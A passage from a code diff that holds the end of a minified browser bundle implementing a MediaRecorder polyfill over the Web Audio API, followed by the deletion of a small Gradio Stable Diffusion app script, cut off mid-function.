s=n.destination;if(s.channelCount!==r)try{s.channelCount=r}catch{}o&&s.channelCountMode!=="explicit"&&(s.channelCountMode="explicit"),s.maxChannelCount===0&&Object.defineProperty(s,"maxChannelCount",{value:r});const a=e(n,{channelCount:r,channelCountMode:s.channelCountMode,channelInterpretation:s.channelInterpretation,gain:1});return t(a,"channelCount",c=>()=>c.call(a),c=>i=>{c.call(a,i);try{s.channelCount=i}catch(u){if(i>s.maxChannelCount)throw u}}),t(a,"channelCountMode",c=>()=>c.call(a),c=>i=>{c.call(a,i),s.channelCountMode=i}),t(a,"channelInterpretation",c=>()=>c.call(a),c=>i=>{c.call(a,i),s.channelInterpretation=i}),Object.defineProperty(a,"maxChannelCount",{get:()=>s.maxChannelCount}),a.connect(s),a},Ls=e=>e===null?null:e.hasOwnProperty("AudioWorkletNode")?e.AudioWorkletNode:null,Ps=e=>{const{port1:t}=new MessageChannel;try{t.postMessage(e)}finally{t.close()}},xs=(e,t,n,r,o)=>(s,a,c,i,u,d)=>{if(c!==null)try{const l=new c(s,i,d),h=new Map;let m=null;if(Object.defineProperties(l,{channelCount:{get:()=>d.channelCount,set:()=>{throw e()}},channelCountMode:{get:()=>"explicit",set:()=>{throw e()}},onprocessorerror:{get:()=>m,set:w=>{typeof m=="function"&&l.removeEventListener("processorerror",m),m=typeof w=="function"?w:null,typeof m=="function"&&l.addEventListener("processorerror",m)}}}),l.addEventListener=(w=>(...f)=>{if(f[0]==="processorerror"){const p=typeof f[1]=="function"?f[1]:typeof f[1]=="object"&&f[1]!==null&&typeof f[1].handleEvent=="function"?f[1].handleEvent:null;if(p!==null){const g=h.get(f[1]);g!==void 0?f[1]=g:(f[1]=v=>{v.type==="error"?(Object.defineProperties(v,{type:{value:"processorerror"}}),p(v)):p(new ErrorEvent(f[0],{...v}))},h.set(p,f[1]))}}return w.call(l,"error",f[1],f[2]),w.call(l,...f)})(l.addEventListener),l.removeEventListener=(w=>(...f)=>{if(f[0]==="processorerror"){const p=h.get(f[1]);p!==void 0&&(h.delete(f[1]),f[1]=p)}return w.call(l,"error",f[1],f[2]),w.call(l,f[0],f[1],f[2])})(l.removeEventListener),d.numberOfOutputs!==0){const w=n(s,{channelCount:1,channelCountMode:"explicit",channelInterpretation:"discrete",gain:0});return l.connect(w).connect(s.destination),o(l,()=>w.disconnect(),()=>w.connect(s.destination))}return l}catch(l){throw l.code===11?r():l}if(u===void 0)throw r();return Ps(d),t(s,a,u,d)},Us=(e,t)=>e===null?512:Math.max(512,Math.min(16384,Math.pow(2,Math.round(Math.log2(e*t))))),Bs=e=>new Promise((t,n)=>{const{port1:r,port2:o}=new MessageChannel;r.onmessage=({data:s})=>{r.close(),o.close(),t(s)},r.onmessageerror=({data:s})=>{r.close(),o.close(),n(s)},o.postMessage(e)}),Ds=async(e,t)=>{const n=await Bs(t);return new e(n)},Ws=(e,t,n,r)=>{let o=dt.get(e);o===void 0&&(o=new WeakMap,dt.set(e,o));const s=Ds(n,r);return o.set(t,s),s},Vs=(e,t,n,r,o,s,a,c,i,u,d,l,h)=>(m,w,f,p)=>{if(p.numberOfInputs===0&&p.numberOfOutputs===0)throw i();const g=Array.isArray(p.outputChannelCount)?p.outputChannelCount:Array.from(p.outputChannelCount);if(g.some(b=>b<1))throw i();if(g.length!==p.numberOfOutputs)throw t();if(p.channelCountMode!=="explicit")throw i();const v=p.channelCount*p.numberOfInputs,A=g.reduce((b,S)=>b+S,0),T=f.parameterDescriptors===void 0?0:f.parameterDescriptors.length;if(v+T>6||A>6)throw i();const _=new MessageChannel,E=[],y=[];for(let b=0;bb===void 0?0:b},maxValue:{get:()=>S===void 0?Ye:S},minValue:{get:()=>z===void 0?Ce:z}}),C.push(V)}const M=r(m,{channelCount:1,channelCountMode:"explicit",channelInterpretation:"speakers",numberOfInputs:Math.max(1,v+T)}),I=Us(w,m.sampleRate),N=c(m,I,v+T,Math.max(1,A)),P=o(m,{channelCount:Math.max(1,A),channelCountMode:"explicit",channelInterpretation:"discrete",numberOfOutputs:Math.max(1,A)}),k=[];for(let b=0;b{const z=C[S];return z.connect(M,0,v+S),z.start(0),[b,z.offset]}));M.connect(N);let U=p.channelInterpretation,R=null;const x=p.numberOfOutputs===0?[N]:k,D={get bufferSize(){return I},get channelCount(){return p.channelCount},set channelCount(b){throw n()},get channelCountMode(){return p.channelCountMode},set channelCountMode(b){throw n()},get channelInterpretation(){return U},set channelInterpretation(b){for(const S of E)S.channelInterpretation=b;U=b},get context(){return N.context},get inputs(){return E},get numberOfInputs(){return p.numberOfInputs},get numberOfOutputs(){return p.numberOfOutputs},get onprocessorerror(){return R},set onprocessorerror(b){typeof R=="function"&&D.removeEventListener("processorerror",R),R=typeof b=="function"?b:null,typeof R=="function"&&D.addEventListener("processorerror",R)},get parameters(){return B},get port(){return _.port2},addEventListener(...b){return N.addEventListener(b[0],b[1],b[2])},connect:e.bind(null,x),disconnect:u.bind(null,x),dispatchEvent(...b){return N.dispatchEvent(b[0])},removeEventListener(...b){return N.removeEventListener(b[0],b[1],b[2])}},O=new Map;_.port1.addEventListener=(b=>(...S)=>{if(S[0]==="message"){const z=typeof S[1]=="function"?S[1]:typeof S[1]=="object"&&S[1]!==null&&typeof S[1].handleEvent=="function"?S[1].handleEvent:null;if(z!==null){const F=O.get(S[1]);F!==void 0?S[1]=F:(S[1]=V=>{d(m.currentTime,m.sampleRate,()=>z(V))},O.set(z,S[1]))}}return b.call(_.port1,S[0],S[1],S[2])})(_.port1.addEventListener),_.port1.removeEventListener=(b=>(...S)=>{if(S[0]==="message"){const z=O.get(S[1]);z!==void 0&&(O.delete(S[1]),S[1]=z)}return b.call(_.port1,S[0],S[1],S[2])})(_.port1.removeEventListener);let L=null;Object.defineProperty(_.port1,"onmessage",{get:()=>L,set:b=>{typeof L=="function"&&_.port1.removeEventListener("message",L),L=typeof b=="function"?b:null,typeof L=="function"&&(_.port1.addEventListener("message",L),_.port1.start())}}),f.prototype.port=_.port1;let W=null;Ws(m,D,f,p).then(b=>W=b);const he=je(p.numberOfInputs,p.channelCount),pe=je(p.numberOfOutputs,g),me=f.parameterDescriptors===void 0?[]:f.parameterDescriptors.reduce((b,{name:S})=>({...b,[S]:new Float32Array(128)}),{});let j=!0;const H=()=>{p.numberOfOutputs>0&&N.disconnect(P);for(let b=0,S=0;b{if(W!==null){const z=l(D);for(let F=0;F{Fe(b,me,V,v+$,F)});for(let V=0;V{if(z[ne].size>0)return Ie.set(ne,I/128),Y;const rt=Ie.get(ne);return rt===void 0?[]:(Y.every(or=>or.every(sr=>sr===0))&&(rt===1?Ie.delete(ne):Ie.set(ne,rt-1)),Y)});j=d(m.currentTime+F/m.sampleRate,m.sampleRate,()=>W.process(V,pe,me));for(let Y=0,ne=0;YN.connect(nt).connect(m.destination),Pt=()=>{N.disconnect(nt),nt.disconnect()},nr=()=>{if(j){Pt(),p.numberOfOutputs>0&&N.connect(P);for(let b=0,S=0;b{j&&(Lt(),H()),tt=!1};return Lt(),h(D,nr,rr)},Fs=(e,t)=>(n,r)=>{const o=n.createChannelMerger(r.numberOfInputs);return e!==null&&e.name==="webkitAudioContext"&&t(n,o),Me(o,r),o},js=e=>{const t=e.numberOfOutputs;Object.defineProperty(e,"channelCount",{get:()=>t,set:n=>{if(n!==t)throw Z()}}),Object.defineProperty(e,"channelCountMode",{get:()=>"explicit",set:n=>{if(n!=="explicit")throw Z()}}),Object.defineProperty(e,"channelInterpretation",{get:()=>"discrete",set:n=>{if(n!=="discrete")throw Z()}})},Sn=(e,t)=>{const n=e.createChannelSplitter(t.numberOfOutputs);return Me(n,t),js(n),n},$s=(e,t,n,r,o)=>(s,a)=>{if(s.createConstantSource===void 0)return n(s,a);const c=s.createConstantSource();return Me(c,a),Ct(c,a,"offset"),t(r,()=>r(s))||Mn(c),t(o,()=>o(s))||On(c),e(s,c),c},Rn=(e,t)=>(e.connect=t.connect.bind(t),e.disconnect=t.disconnect.bind(t),e),Gs=(e,t,n,r)=>(o,{offset:s,...a})=>{const c=o.createBuffer(1,2,44100),i=t(o,{buffer:null,channelCount:2,channelCountMode:"max",channelInterpretation:"speakers",loop:!1,loopEnd:0,loopStart:0,playbackRate:1}),u=n(o,{...a,gain:s}),d=c.getChannelData(0);d[0]=1,d[1]=1,i.buffer=c,i.loop=!0;const l={get bufferSize(){},get channelCount(){return u.channelCount},set channelCount(w){u.channelCount=w},get channelCountMode(){return u.channelCountMode},set channelCountMode(w){u.channelCountMode=w},get channelInterpretation(){return u.channelInterpretation},set channelInterpretation(w){u.channelInterpretation=w},get context(){return u.context},get inputs(){return[]},get numberOfInputs(){return i.numberOfInputs},get numberOfOutputs(){return u.numberOfOutputs},get offset(){return u.gain},get onended(){return i.onended},set onended(w){i.onended=w},addEventListener(...w){return i.addEventListener(w[0],w[1],w[2])},dispatchEvent(...w){return i.dispatchEvent(w[0])},removeEventListener(...w){return i.removeEventListener(w[0],w[1],w[2])},start(w=0){i.start.call(i,w)},stop(w=0){i.stop.call(i,w)}},h=()=>i.connect(u),m=()=>i.disconnect(u);return e(o,i),r(Rn(l,u),h,m)},ae=(e,t)=>{const n=e.createGain();return Me(n,t),Ct(n,t,"gain"),n},zs=(e,{mediaStream:t})=>{const n=t.getAudioTracks();n.sort((s,a)=>s.ida.id?1:0);const r=n.slice(0,1),o=e.createMediaStreamSource(new MediaStream(r));return Object.defineProperty(o,"mediaStream",{value:t}),o},qs=e=>e===null?null:e.hasOwnProperty("OfflineAudioContext")?e.OfflineAudioContext:e.hasOwnProperty("webkitOfflineAudioContext")?e.webkitOfflineAudioContext:null,Hs=e=>(t,{disableNormalization:n,imag:r,real:o})=>{const s=r instanceof Float32Array?r:new Float32Array(r),a=o instanceof Float32Array?o:new Float32Array(o),c=t.createPeriodicWave(a,s,{disableNormalization:n});if(Array.from(r).length<2)throw e();return c},Tt=(e,t,n,r)=>e.createScriptProcessor(t,n,r),de=()=>new DOMException("","NotSupportedError"),Ys={disableNormalization:!1},Xs=(e,t,n,r)=>class In{constructor(s,a){const c=t(s),i=r({...Ys,...a}),u=e(c,i);return n.add(u),u}static[Symbol.hasInstance](s){return s!==null&&typeof s=="object"&&Object.getPrototypeOf(s)===In.prototype||n.has(s)}},Zs=(e,t)=>(n,r,o)=>(e(r).replay(o),t(r,n,o)),Ks=(e,t,n)=>async(r,o,s)=>{const a=e(r);await Promise.all(a.activeInputs.map((c,i)=>Array.from(c).map(async([u,d])=>{const h=await t(u).render(u,o),m=r.context.destination;!n(u)&&(r!==m||!n(r))&&h.connect(s,d,i)})).reduce((c,i)=>[...c,...i],[]))},Js=(e,t,n)=>async(r,o,s)=>{const a=t(r);await Promise.all(Array.from(a.activeInputs).map(async([c,i])=>{const d=await e(c).render(c,o);n(c)||d.connect(s,i)}))},Qs=(e,t,n,r)=>o=>e(wt,()=>wt(o))?Promise.resolve(e(r,r)).then(s=>{if(!s){const a=n(o,512,0,1);o.oncomplete=()=>{a.onaudioprocess=null,a.disconnect()},a.onaudioprocess=()=>o.currentTime,a.connect(o.destination)}return o.startRendering()}):new Promise(s=>{const a=t(o,{channelCount:1,channelCountMode:"explicit",channelInterpretation:"discrete",gain:0});o.oncomplete=c=>{a.disconnect(),s(c.renderedBuffer)},a.connect(o.destination),o.startRendering()}),ea=e=>(t,n)=>{e.set(t,n)},ta=e=>()=>{if(e===null)return!1;try{new e({length:1,sampleRate:44100})}catch{return!1}return!0},na=(e,t)=>async()=>{if(e===null)return!0;if(t===null)return!1;const n=new Blob(['class A extends AudioWorkletProcessor{process(i){this.port.postMessage(i,[i[0][0].buffer])}}registerProcessor("a",A)'],{type:"application/javascript; charset=utf-8"}),r=new t(1,128,44100),o=URL.createObjectURL(n);let s=!1,a=!1;try{await r.audioWorklet.addModule(o);const c=new e(r,"a",{numberOfOutputs:0}),i=r.createOscillator();c.port.onmessage=()=>s=!0,c.onprocessorerror=()=>a=!0,i.connect(c),i.start(0),await r.startRendering()}catch{}finally{URL.revokeObjectURL(o)}return s&&!a},ra=(e,t)=>()=>{if(t===null)return Promise.resolve(!1);const n=new t(1,1,44100),r=e(n,{channelCount:1,channelCountMode:"explicit",channelInterpretation:"discrete",gain:0});return new Promise(o=>{n.oncomplete=()=>{r.disconnect(),o(n.currentTime!==0)},n.startRendering()})},oa=()=>new DOMException("","UnknownError"),sa=()=>typeof window>"u"?null:window,aa=(e,t)=>n=>{n.copyFromChannel=(r,o,s=0)=>{const a=e(s),c=e(o);if(c>=n.numberOfChannels)throw t();const i=n.length,u=n.getChannelData(c),d=r.length;for(let l=a<0?-a:0;l+a{const a=e(s),c=e(o);if(c>=n.numberOfChannels)throw t();const i=n.length,u=n.getChannelData(c),d=r.length;for(let l=a<0?-a:0;l+at=>{t.copyFromChannel=(n=>(r,o,s=0)=>{const a=e(s),c=e(o);if(a(r,o,s=0)=>{const a=e(s),c=e(o);if(a(t,n)=>{const r=n.createBuffer(1,1,44100);t.buffer===null&&(t.buffer=r),e(t,"buffer",o=>()=>{const s=o.call(t);return s===r?null:s},o=>s=>o.call(t,s===null?r:s))},ua=(e,t)=>(n,r)=>{r.channelCount=1,r.channelCountMode="explicit",Object.defineProperty(r,"channelCount",{get:()=>1,set:()=>{throw e()}}),Object.defineProperty(r,"channelCountMode",{get:()=>"explicit",set:()=>{throw e()}});const o=n.createBufferSource();t(r,()=>{const c=r.numberOfInputs;for(let i=0;io.disconnect(r))},la=(e,t,n)=>e.copyFromChannel===void 0?e.getChannelData(n)[0]:(e.copyFromChannel(t,n),t[0]),Nt=(e,t,n,r)=>{let o=e;for(;!o.hasOwnProperty(t);)o=Object.getPrototypeOf(o);const{get:s,set:a}=Object.getOwnPropertyDescriptor(o,t);Object.defineProperty(e,t,{get:n(s),set:r(a)})},da=e=>({...e,outputChannelCount:e.outputChannelCount!==void 0?e.outputChannelCount:e.numberOfInputs===1&&e.numberOfOutputs===1?[e.channelCount]:Array.from({length:e.numberOfOutputs},()=>1)}),fa=e=>{const{imag:t,real:n}=e;return t===void 0?n===void 0?{...e,imag:[0,0],real:[0,0]}:{...e,imag:Array.from(n,()=>0),real:n}:n===void 0?{...e,imag:t,real:Array.from(t,()=>0)}:{...e,imag:t,real:n}},kn=(e,t,n)=>{try{e.setValueAtTime(t,n)}catch(r){if(r.code!==9)throw r;kn(e,t,n+1e-7)}},ha=e=>{const t=e.createBufferSource();t.start();try{t.start()}catch{return!0}return!1},pa=e=>{const t=e.createBufferSource(),n=e.createBuffer(1,1,44100);t.buffer=n;try{t.start(0,1)}catch{return!1}return!0},ma=e=>{const t=e.createBufferSource();t.start();try{t.stop()}catch{return!1}return!0},Ln=e=>{const t=e.createOscillator();try{t.start(-1)}catch(n){return n instanceof RangeError}return!1},ga=e=>{const t=e.createBuffer(1,1,44100),n=e.createBufferSource();n.buffer=t,n.start(),n.stop();try{return n.stop(),!0}catch{return!1}},Pn=e=>{const t=e.createOscillator();try{t.stop(-1)}catch(n){return n instanceof RangeError}return!1},wa=e=>{const{port1:t,port2:n}=new MessageChannel;try{t.postMessage(e)}finally{t.close(),n.close()}},va=e=>{e.start=(t=>(n=0,r=0,o)=>{const s=e.buffer,a=s===null?r:Math.min(s.duration,r);s!==null&&a>s.duration-.5/e.context.sampleRate?t.call(e,n,0,0):t.call(e,n,a,o)})(e.start)},_a=(e,t)=>{const n=t.createGain();e.connect(n);const r=(o=>()=>{o.call(e,n),e.removeEventListener("ended",r)})(e.disconnect);e.addEventListener("ended",r),Rn(e,n),e.stop=(o=>{let s=!1;return(a=0)=>{if(s)try{o.call(e,a)}catch{n.gain.setValueAtTime(0,a)}else o.call(e,a),s=!0}})(e.stop)},Oe=(e,t)=>n=>{const r={value:e};return Object.defineProperties(n,{currentTarget:r,target:r}),typeof t=="function"?t.call(e,n):t.handleEvent.call(e,n)},ya=eo(le),Ea=ao(le),Aa=Jo(qe),ba=new WeakMap,Ca=ls(ba),fe=jo(new Map,new WeakMap),Q=sa(),xn=us(q),Xe=Ks(q,xn,ue),ee=hs(pn),ve=qs(Q),J=As(ve),Un=new WeakMap,Bn=ss(Oe),Ze=Is(Q),Dn=vs(Ze),Wn=_s(Q),Ta=ys(Q),Ae=Ls(Q),Se=Po(to(ln),so(ya,Ea,mt,Aa,gt,q,Ca,be,X,le,se,ue,xe),fe,ws(ut,gt,q,X,Ee,se),ie,gs,de,Ko(mt,ut,q,X,Ee,ee,se,J),ts(Un,q,K),Bn,ee,Dn,Wn,Ta,J,Ae),Vn=new WeakSet,Qt=Os(Q),Fn=Yo(new Uint32Array(1)),jn=aa(Fn,ie),$n=ia(Fn),Na=lo(Vn,fe,de,Qt,ve,ta(Qt),jn,$n),Mt=io(ae),Gn=Js(xn,Te,ue),Ot=$o(Gn),Ke=Rs(Mt,fe,ha,pa,ma,Ln,ga,Pn,va,ca(Nt),_a),St=Zs(ds(Te),Gn),Ma=po(Ot,Ke,X,St,Xe),Je=xo(no(fn),Un,hn,Uo,Yr,Xr,Zr,Kr,Jr,at,cn,Ze,kn),Oa=ho(Se,Ma,Je,Z,Ke,ee,J,Oe),Sa=bo(Se,Co,ie,Z,ks(ae,Nt),ee,J,Xe),Qe=Ms(le,Wn),Ra=ua(Z,Qe),Rt=Fs(Ze,Ra),Ia=Gs(Mt,Ke,ae,Qe),Re=$s(Mt,fe,Ia,Ln,Pn),ka=Ho(Ot,Re,X,St,Xe),La=qo(Se,Je,ka,Re,ee,J,Oe),Pa=Qs(fe,ae,Tt,ra(ae,ve)),xa=To(Je,Rt,Re,Tt,de,la,J,Nt),zn=new WeakMap,Ua=Ns(Sa,xa,Bn,J,zn,Oe),Ba=Hs(ie);Xs(Ba,ee,new WeakSet,fa);const qn=bs(Q),It=as(Q),Hn=new WeakMap,Da=ps(Hn,ve),en=qn?oo(fe,de,os(Q),It,is(Qr),ee,Da,J,Ae,new WeakMap,new WeakMap,na(Ae,ve),Q):void 0,Wa=Es(Dn,J);Zo(Vn,fe,Xo,rs,new WeakSet,ee,Wa,ht,wt,jn,$n);const Va=Cs(Se,zs,ee,J),Yn=ms(zn),Fa=co(Yn),Xn=Go(ie),ja=Qo(Yn),Zn=ns(ie),Kn=new WeakMap,$a=cs(Kn,K),Ga=Vs(Xn,ie,Z,Rt,Sn,Re,ae,Tt,de,Zn,It,$a,Qe),za=xs(Z,Ga,ae,de,Qe),qa=Fo(Ot,Xn,Ke,Rt,Sn,Re,ae,ja,Zn,It,X,Ae,ve,St,Xe,Pa),Ha=fs(Hn),Ya=ea(Kn),tn=qn?Do(Fa,Se,Je,qa,za,q,Ha,ee,J,Ae,da,Ya,wa,Oe):void 0,Xa=Ts(Z,de,oa,Ua,Ze),Jn="Missing AudioWorklet support. Maybe this is not running in a secure context.",Za=async(e,t,n,r,o)=>{const{encoderId:s,port:a}=await on(o,t.sampleRate);if(tn===void 0)throw new Error(Jn);const c=new Oa(t,{buffer:e}),i=new Va(t,{mediaStream:r}),u=Gr(tn,t,{channelCount:n});return{audioBufferSourceNode:c,encoderId:s,mediaStreamAudioSourceNode:i,port:a,recorderAudioWorkletNode:u}},Ka=(e,t,n,r)=>(o,s,a)=>{var c;const i=(c=s.getAudioTracks()[0])===null||c===void 0?void 0:c.getSettings().sampleRate,u=new Xa({latencyHint:"playback",sampleRate:i}),d=Math.max(1024,Math.ceil(u.baseLatency*u.sampleRate)),l=new Na({length:d,sampleRate:u.sampleRate}),h=[],m=$r(C=>{if(en===void 0)throw new Error(Jn);return en(u,C)});let w=null,f=null,p=null,g=null,v=!0;const A=C=>{o.dispatchEvent(e("dataavailable",{data:new Blob(C,{type:a})}))},T=async(C,M)=>{const I=await Ue(C,M);p===null?h.push(...I):(A(I),g=T(C,M))},_=()=>(v=!0,u.resume()),E=()=>{p!==null&&(w!==null&&(s.removeEventListener("addtrack",w),s.removeEventListener("removetrack",w)),f!==null&&clearTimeout(f),p.then(async({constantSourceNode:C,encoderId:M,mediaStreamAudioSourceNode:I,recorderAudioWorkletNode:N})=>{g!==null&&(g.catch(()=>{}),g=null),await N.stop(),I.disconnect(N),C.stop();const P=await Ue(M,null);p===null&&await y(),A([...h,...P]),h.length=0,o.dispatchEvent(new Event("stop"))}),p=null)},y=()=>(v=!1,u.suspend());return y(),{get mimeType(){return a},get state(){return p===null?"inactive":v?"recording":"paused"},pause(){if(p===null)throw n();v&&(y(),o.dispatchEvent(new Event("pause")))},resume(){if(p===null)throw n();v||(_(),o.dispatchEvent(new Event("resume")))},start(C){var M;if(p!==null)throw n();if(s.getVideoTracks().length>0)throw r();o.dispatchEvent(new Event("start"));const I=s.getAudioTracks(),N=I.length===0?2:(M=I[0].getSettings().channelCount)!==null&&M!==void 0?M:2;p=Promise.all([_(),m.then(()=>Za(l,u,N,s,a))]).then(async([,{audioBufferSourceNode:k,encoderId:B,mediaStreamAudioSourceNode:U,port:R,recorderAudioWorkletNode:x}])=>{U.connect(x),await new Promise(O=>{k.onended=O,k.connect(x),k.start(u.currentTime+d/u.sampleRate)}),k.disconnect(x);const D=new La(u,{offset:0});return D.onended=()=>D.disconnect(),D.connect(u.destination),D.start(),await x.record(R),C!==void 0&&(g=T(B,C)),{constantSourceNode:D,encoderId:B,mediaStreamAudioSourceNode:U,recorderAudioWorkletNode:x}});const P=s.getTracks();w=()=>{E(),o.dispatchEvent(new ErrorEvent("error",{error:t()}))},s.addEventListener("addtrack",w),s.addEventListener("removetrack",w),f=setInterval(()=>{const k=s.getTracks();(k.length!==P.length||k.some((B,U)=>B!==P[U]))&&w!==null&&w()},1e3)},stop:E}};class st{constructor(t,n=0,r){if(n<0||r!==void 0&&r<0)throw new RangeError;const o=t.reduce((d,l)=>d+l.byteLength,0);if(n>o||r!==void 0&&n+r>o)throw new RangeError;const s=[],a=r===void 0?o-n:r,c=[];let i=0,u=n;for(const d of t)if(c.length===0)if(d.byteLength>u){i=d.byteLength-u;const l=i>a?a:i;s.push(new DataView(d,u,l)),c.push(d)}else u-=d.byteLength;else if(ia?d.byteLength-i+a:d.byteLength;s.push(new DataView(d,0,l)),c.push(d)}this._buffers=c,this._byteLength=a,this._byteOffset=u,this._dataViews=s,this._internalBuffer=new DataView(new ArrayBuffer(8))}get buffers(){return this._buffers}get byteLength(){return this._byteLength}get byteOffset(){return this._byteOffset}getFloat32(t,n){return this._internalBuffer.setUint8(0,this.getUint8(t+0)),this._internalBuffer.setUint8(1,this.getUint8(t+1)),this._internalBuffer.setUint8(2,this.getUint8(t+2)),this._internalBuffer.setUint8(3,this.getUint8(t+3)),this._internalBuffer.getFloat32(0,n)}getFloat64(t,n){return this._internalBuffer.setUint8(0,this.getUint8(t+0)),this._internalBuffer.setUint8(1,this.getUint8(t+1)),this._internalBuffer.setUint8(2,this.getUint8(t+2)),this._internalBuffer.setUint8(3,this.getUint8(t+3)),this._internalBuffer.setUint8(4,this.getUint8(t+4)),this._internalBuffer.setUint8(5,this.getUint8(t+5)),this._internalBuffer.setUint8(6,this.getUint8(t+6)),this._internalBuffer.setUint8(7,this.getUint8(t+7)),this._internalBuffer.getFloat64(0,n)}getInt16(t,n){return this._internalBuffer.setUint8(0,this.getUint8(t+0)),this._internalBuffer.setUint8(1,this.getUint8(t+1)),this._internalBuffer.getInt16(0,n)}getInt32(t,n){return this._internalBuffer.setUint8(0,this.getUint8(t+0)),this._internalBuffer.setUint8(1,this.getUint8(t+1)),this._internalBuffer.setUint8(2,this.getUint8(t+2)),this._internalBuffer.setUint8(3,this.getUint8(t+3)),this._internalBuffer.getInt32(0,n)}getInt8(t){const[n,r]=this._findDataViewWithOffset(t);return n.getInt8(t-r)}getUint16(t,n){return this._internalBuffer.setUint8(0,this.getUint8(t+0)),this._internalBuffer.setUint8(1,this.getUint8(t+1)),this._internalBuffer.getUint16(0,n)}getUint32(t,n){return this._internalBuffer.setUint8(0,this.getUint8(t+0)),this._internalBuffer.setUint8(1,this.getUint8(t+1)),this._internalBuffer.setUint8(2,this.getUint8(t+2)),this._internalBuffer.setUint8(3,this.getUint8(t+3)),this._internalBuffer.getUint32(0,n)}getUint8(t){const[n,r]=this._findDataViewWithOffset(t);return n.getUint8(t-r)}setFloat32(t,n,r){this._internalBuffer.setFloat32(0,n,r),this.setUint8(t,this._internalBuffer.getUint8(0)),this.setUint8(t+1,this._internalBuffer.getUint8(1)),this.setUint8(t+2,this._internalBuffer.getUint8(2)),this.setUint8(t+3,this._internalBuffer.getUint8(3))}setFloat64(t,n,r){this._internalBuffer.setFloat64(0,n,r),this.setUint8(t,this._internalBuffer.getUint8(0)),this.setUint8(t+1,this._internalBuffer.getUint8(1)),this.setUint8(t+2,this._internalBuffer.getUint8(2)),this.setUint8(t+3,this._internalBuffer.getUint8(3)),this.setUint8(t+4,this._internalBuffer.getUint8(4)),this.setUint8(t+5,this._internalBuffer.getUint8(5)),this.setUint8(t+6,this._internalBuffer.getUint8(6)),this.setUint8(t+7,this._internalBuffer.getUint8(7))}setInt16(t,n,r){this._internalBuffer.setInt16(0,n,r),this.setUint8(t,this._internalBuffer.getUint8(0)),this.setUint8(t+1,this._internalBuffer.getUint8(1))}setInt32(t,n,r){this._internalBuffer.setInt32(0,n,r),this.setUint8(t,this._internalBuffer.getUint8(0)),this.setUint8(t+1,this._internalBuffer.getUint8(1)),this.setUint8(t+2,this._internalBuffer.getUint8(2)),this.setUint8(t+3,this._internalBuffer.getUint8(3))}setInt8(t,n){const[r,o]=this._findDataViewWithOffset(t);r.setInt8(t-o,n)}setUint16(t,n,r){this._internalBuffer.setUint16(0,n,r),this.setUint8(t,this._internalBuffer.getUint8(0)),this.setUint8(t+1,this._internalBuffer.getUint8(1))}setUint32(t,n,r){this._internalBuffer.setUint32(0,n,r),this.setUint8(t,this._internalBuffer.getUint8(0)),this.setUint8(t+1,this._internalBuffer.getUint8(1)),this.setUint8(t+2,this._internalBuffer.getUint8(2)),this.setUint8(t+3,this._internalBuffer.getUint8(3))}setUint8(t,n){const[r,o]=this._findDataViewWithOffset(t);r.setUint8(t-o,n)}_findDataViewWithOffset(t){let n=0;for(const r of this._dataViews){const o=n+r.byteLength;if(t>=n&&t(s,a,c,i)=>{const u=c.getAudioTracks(),d=[],l=u.length===0?void 0:u[0].getSettings().channelCount,h=new a(c,{mimeType:"audio/webm;codecs=pcm"}),m=u.length===0?void 0:u[0].getSettings().sampleRate;let w=null,f=()=>{};const p=A=>{s.dispatchEvent(e("dataavailable",{data:new Blob(A,{type:i})}))},g=async(A,T)=>{const _=await Ue(A,T);h.state==="inactive"?d.push(..._):(p(_),w=g(A,T))},v=()=>{h.state!=="inactive"&&(w!==null&&(w.catch(()=>{}),w=null),f(),f=()=>{},h.stop())};return h.addEventListener("error",()=>{v(),s.dispatchEvent(new ErrorEvent("error",{error:t()}))}),h.addEventListener("start",()=>s.dispatchEvent(new Event("start"))),{get mimeType(){return i},get state(){return h.state},pause(){return h.pause()},resume(){return h.resume()},start(A){if(c.getVideoTracks().length>0)throw n();if(h.state==="inactive"){if(m===void 0)throw new Error("The sampleRate is not defined.");let T=!1,_=!1,E=0,y=on(i,m);f=()=>{_=!0};const C=sn(h,"dataavailable")(({data:M})=>{E+=1,y=y.then(async({dataView:I=null,elementType:N=null,encoderId:P,port:k})=>{const B=await M.arrayBuffer();E-=1;const U=I===null?new st([B]):new st([...I.buffers,B],I.byteOffset);if(!T&&h.state==="recording"&&!_){const L=o(U,0);if(L===null)return{dataView:U,elementType:N,encoderId:P,port:k};const{value:W}=L;if(W!==172351395)return{dataView:I,elementType:N,encoderId:P,port:k};T=!0}const{currentElementType:R,offset:x,contents:D}=r(U,N,l),O=xk.postMessage(L,L.map(({buffer:W})=>W))),E===0&&(h.state==="inactive"||_)&&(Ue(P,null).then(L=>{p([...d,...L]),d.length=0,s.dispatchEvent(new Event("stop"))}),k.postMessage([]),k.close(),C()),{dataView:O,elementType:R,encoderId:P,port:k}})});A!==void 0&&y.then(({encoderId:M})=>w=g(M,A))}h.start(100)},stop:v}},Qa=()=>typeof window>"u"?null:window,Qn=(e,t)=>{if(t>=e.byteLength)return null;const n=e.getUint8(t);if(n>127)return 1;if(n>63)return 2;if(n>31)return 3;if(n>15)return 4;if(n>7)return 5;if(n>3)return 6;if(n>1)return 7;if(n>0)return 8;const r=Qn(e,t+1);return r===null?null:r+8},ei=(e,t)=>n=>{const r={value:e};return Object.defineProperties(n,{currentTarget:r,target:r}),typeof t=="function"?t.call(e,n):t.handleEvent.call(e,n)},er=[],et=Qa(),ti=Er(et),tr=pr(ti),ni=Ka(tr,_t,vr,$e),kt=Nr(Qn),ri=Cr(kt),oi=Tr(kt),si=mr(ri,oi),ai=Ja(tr,_t,$e,si,kt),ii=wr(et),ci=br(et),ui=Ar(_t,$e),Ci=yr(ui,$e,ni,ai,er,gr(ii,ei),ci),Ti=()=>_r(et),Ni=async e=>{er.push(await hr(e))};export{Ci as MediaRecorder,Ti as isSupported,Ni as register}; -//# sourceMappingURL=module-447425fe.js.map diff --git a/spaces/Dagfinn1962/CPU/app1.py b/spaces/Dagfinn1962/CPU/app1.py deleted file mode 100644 index e0187f41896b19b1affe35dad87e73c625ebb299..0000000000000000000000000000000000000000 --- a/spaces/Dagfinn1962/CPU/app1.py +++ /dev/null @@ -1,40 +0,0 @@ -import gradio as gr -import torch -import numpy as np -import modin.pandas as pd -from PIL import Image -from diffusers import DiffusionPipeline, StableDiffusionLatentUpscalePipeline - -device = "cuda" if torch.cuda.is_available() else "cpu" -pipe = DiffusionPipeline.from_pretrained("dreamlike-art/dreamlike-photoreal-2.0", torch_dtype=torch.float16, safety_checker=None) -upscaler = StableDiffusionLatentUpscalePipeline.from_pretrained("stabilityai/sd-x2-latent-upscaler", torch_dtype=torch.float16) -upscaler = upscaler.to(device) -pipe = pipe.to(device) - -def genie 